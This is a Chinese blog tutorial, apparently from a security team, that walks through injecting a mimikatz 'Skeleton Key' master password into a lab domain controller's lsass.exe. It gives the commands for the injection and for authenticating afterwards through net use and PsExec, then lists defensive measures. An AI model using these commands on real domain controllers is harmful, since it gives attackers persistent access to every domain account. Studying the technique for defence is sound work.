域渗透|域权限维持之Skeleton Key

最新推荐文章于 2023-08-09 16:30:00 发布
最新推荐文章于 2023-08-09 16:30:00 发布
阅读量568 收藏 1
点赞数
分类专栏: 域渗透 文章标签: windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42282189/article/details/120117182
版权

作者: r0n1n
免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。

0x00 前言

Skeleton Key(万能密码)方法可以对域内管理员权限进行持久化操作,使用mimikatz完成注入Skeleon Key的操作,将 Skeleton Key注入域控制器的lsass.exe进程。

0x01 测试环境

1、域名:god.com
2、域控制器:
主机名:WIN-2008dc
IP地址:10.10.10.30
用户名:administrator
密码:123.com
3、域成员服务器:
主机名:WIN-2008-1
IP地址:10.10.10.10
用户名:hacker
密码:Hack.com

0x02 本地测试

1、以当前登录用户身份(域成员)列出域控制器 C 盘共享目录中的文件:

dir \\10.10.10.30\c$

在这里插入图片描述
2、使用域管理员账号和密码进行连接:

net use \\10.10.10.30\ipc$ "123.com" /user:god\administrator

在这里插入图片描述
3、在域内服务器中以域管理员权限打开mimikatz,将 Skeleton Key 注入域控制器的 lsass.exe进程:

# 提升权限
privilege::debug

#注入进程 skeleton key
misc::skeleton

在这里插入图片描述
成功后会在域内的所有账号中添加一个 Skeleton Key,其密码默认为:mimikatz,接下来可以使用域内任意用户的配合 Skeleton Key 万能密码(mimikatz)进行域内身份授权验证了。

4、使用域管理员账号和 Skeleton Key 与域控服务器建立IPC通道:

net use \\WIN-2008dc\ipc$ "mimikatz" /user:god\administrator

dir \\WIN-2008dc\c$

在这里插入图片描述
注意:需要与域控(DC)的主机名(hostname——域控的ip无法建立)建立IPC通道,然后再访问。

PsExec.exe \\WIN-2008dc cmd.exe

在这里插入图片描述

0x03 总结

1、域管理员用户要设置强密码,确保恶意代码不会在域控制器中执行。
2、在所有域用户中启用双因子认证,例如智能卡认证。
3、启动应用程序白名单(例如 AppLocker),以限制 mimikatz 在域控制器中的运行。
注意:因为 Skeleton Key 是被注入到 lsass.exe 进程的,所以它只存在于内存中,如果域控服务器重启,万能密码将失效。

0x04 了解更多安全知识

欢迎关注我们的安全公众号,学习更多安全知识!!!
欢迎关注我们的安全公众号,学习更多安全知识!!!
欢迎关注我们的安全公众号,学习更多安全知识!!!
在这里插入图片描述

灼剑(Tsojan)安全团队
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
权限持久化之Skeleton Key(万能密码)
谢公子的博客
02-27 2923
使用Skeleton Key(万能密码),可以对权限进行持久化操作。 mimikatz注入Skeleton Key Skeleton Key攻击的防御措施 2014年,微软在Windows操作系统中增加了LSA保护策略,以防止lsass.exe进程被恶意注入,从而防止mimikatz在非允许的情况下提升到Debug权限。通用的Skeleton Key的防御措施列举如下: 管理员用户设...
渗透——Skeleton Key
citelao的博客
03-21 1907
渗透——Skeleton Key 三好学生 · 2016/02/29 10:24 0x00 前言 上篇介绍了利用SSP来维持权限,美中不足在于其需要控重启才能生效,而在众多的渗透方法中,当然存在不需要控重启即能生效的方法,所以这次就介绍其中的一个方法——Skeleton Key 0x01 简介 Skeleton Key被安装在64位的控服务器上 支
内网安全-权限维持-黄金白银票据维持&基于登录进程劫持-Skeleton Key&SID history&DSRM&SSP权限维持
weixin_45701675的博客
04-25 794
内网安全之权限维持
SkeletonKeyScanner:SkeletonKey 恶意软件扫描仪
06-30
过时的 两个专门的扫描仪和已合并为一个新的通用 IOC 扫描仪,称为 。 LOKI 通过不同的配置文件提供完全免费的 IOC 签名定义。 它包括 Regin、Skeleton Key 和最近发布的签名,这些在 2015 年 1 月 17 日发布的提到。 LOKI 可免费用于私人和商业用途,并在 GPL 下发布。 他是弟弟,我们功能齐全的企业 APT 扫描仪。 Skeleton Key 恶意软件扫描程序 Skeleton Key 恶意软件扫描器 检测基于四种检测方法: 1. File Name IOC 2. Yara Ruleset 3. SHA1 hash check Compares known malicious SHA1 hashes with scanned files 4. Process parameter check Detecting a PsExec.
权限维持】-Skeleton Key
qq_41617902的博客
01-20 199
Skeleton Key:能够让所有用户使用同一个万能密码(默认是mimikatz)进行登录,现有的所有用户使用原密码仍能继续登录
权限维持方法浅析.pdf
08-08
前情提要& 本集简介 Golden Ticket Silver Ticket SID History SID History -Golden Ticket Now ...Skeleton Key DCShadow BadGPO(Group Policy Objects) ACL (Access Control Lists) ACL -AdminSDHolder ACL -DCSync
Skeleton Key-crx插件
04-03
语言:English ... ... ... 站点密钥是站点特定的字符串。 使用超安全的PBKDF2算法对这三部分数据进行重复加密加密。...v3中的更改:-修复了具有站点密钥建议的错误。...v2中的更改:-使用当前选项卡的URL作为站点密钥的建议。
万能钥匙「Skeleton Key」-crx插件
03-23
... ... 站点密钥是站点特定的字符串。 使用超安全的PBKDF2算法对这三部分数据进行重复加密加密。 v3中的更改:-修复了具有站点密钥建议的错误。...v2中的更改:-使用当前选项卡的URL作为站点密钥的建议。...
make_skeleton.rar_skeleton
07-15
标题 "make_skeleton.rar_skeleton" 暗示我们关注的是与骨架算法相关的主题,而“to find a new algorithm for”则表明这是一个关于寻找新算法的任务。标签 "skeleton" 确定了讨论的核心——骨架抽取(Skeleton ...
内网渗透权限维持-控后门-SSP&HOOK&DSRM&SID&Skeleton-Key
m0_62207170的博客
05-14 722
内网渗透权限维持-控后门-SSP&HOOK&DSRM&SID&Skeleton-Key
权限维持Skeleton Key(万能密码)
01-29 560
01、简介 Skeleton Key(万能密码),是一种可以对权限进行持久化的操作,通过将Skeleton Key注入到lsass进程,无需重启控即可生效,而且能够在不影响当前用户正常登录的情况下,让所有用户使用同一个万能密码进行登录,它只存在于内存中,如果控制器重启,注入的 Skeleton Key 将会失效。 02、利用过程 (1)尝试以当前用户身份,查看当前网络资源的连接为空...
常见后门技术总结与分析利用
最新发布
m0_61869253的博客
08-09 168
当获取到控的权限后,为了防止对权限的丢失,hacker也会使用一些技术来维持已获取到的权限。因此,本文对常见的后门技术进行了总结并对其利用方式进行了详细的说明,希望可以对大家的学习提供一些帮助。本文仅仅只对常见的后门技术进行了总结,希望可以对大家的学习有帮助。如有不对,欢迎指正。重新编译生成 HookPasswordChange.dll 并注入 lsass.exe 进程,当管理员修改密码时,将通过 HTTP POST方法将用户密码外带到远程服务器。
Skeleton Key(万能密码)与 Hook PasswordChangeNotify
qq_41320638的博客
07-09 756
1、Skeleton Key 使用Skeleton Key(万能密码),可以对权限进行持久化操作 Skeleton Key特点: Skeleton Key被安装在64位控服务器上 支持Windows Server2003—Windows Server2012 R2 能够让所有用户使用同一个万能密码进行登录 现有的所有用户使用原密码仍能继续登录 重启后失效 使用mimikatz注入Skeleton Key 远程控制器主机名:DC IP:192.168.111.3 用户名:ad.
权限维持(万能密码与SID History滥用)
qq_18811919的博客
03-24 278
本篇文章讲述了万能密码SID History滥用这两种技术是较为常见权限维持手段,这里注意介绍了mimikatz的利用方式。
内网渗透(六十八)之权限维持Skeleton Key
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
05-12 661
戴尔的安全研究人员在一次威胁涉猎中发现了一种可以在活动目录上绕过的单因素身份验证的方法,该方法使得攻击者在获得管理员权限或企业管理员权限的情况下,可以在目标控的LSASS内存中注入特定的密码,然后就可以使用设置的密码来以任何用户身份登录,包括管理员和企业管理员,而用户还可以使用之前正常的密码进行登录,这种攻击方式被称为Skeleton Key(万能密码)。由于设置Skeleton Key需要管理员的权限或企业管理员权限,因此这种攻击方式通常用于权限维持
查看用户密码_Skeleton Key(万能密码)对权限维持
weixin_39756445的博客
12-13 3380
渗透攻击红队一个专注于红队攻击的公众号大家好,这里是渗透攻击红队的第 39 篇文章,本公众号会记录一些我学习红队攻击的复现笔记(由浅到深),不出意外每天一更Skeleton Key使用 Skeleton Key(万能密码),可以对权限进行持久化操作。使用 mimikatz 完成注入 Skeleon Key 的操作,将 Skeleton Key 注入控制器的 lsass.exe ...
权限维持思路总结
技术超强的网络安全平台
12-06 589
当我们在渗透过程中通过艰辛的努力终于获取了目标主机权限后,我们接下来要做的往往是在目标机器上创建一个后门来维持住我们所获得的权限,否则一旦目标密码被改变或者漏洞被修补,那么就会导致我们对服务器权限的丢失。有了后门,我们就可以进出内网如若无人之境,所以权限维持的重要性可见一斑。Windows 操作系统常见持久性后门下面,我们先介绍几种常见的 Windows 系统后门,包括Windows系统隐藏用户、Shift粘粘键后门、注册表后门、Windows 计划任务、Windows 新服务后门、WMI后门等等。Wind
Linux USB驱动分析:usb-skeleton.c详解
"对Linux下的USB-skeleton.c源代码进行分析,了解Linux USB驱动的基本框架和设计原理。" 在Linux操作系统中,USB驱动程序是连接硬件设备与内核的关键部分,它负责处理USB设备的初始化、数据传输以及设备的管理和...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

灼剑(Tsojan)安全团队

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值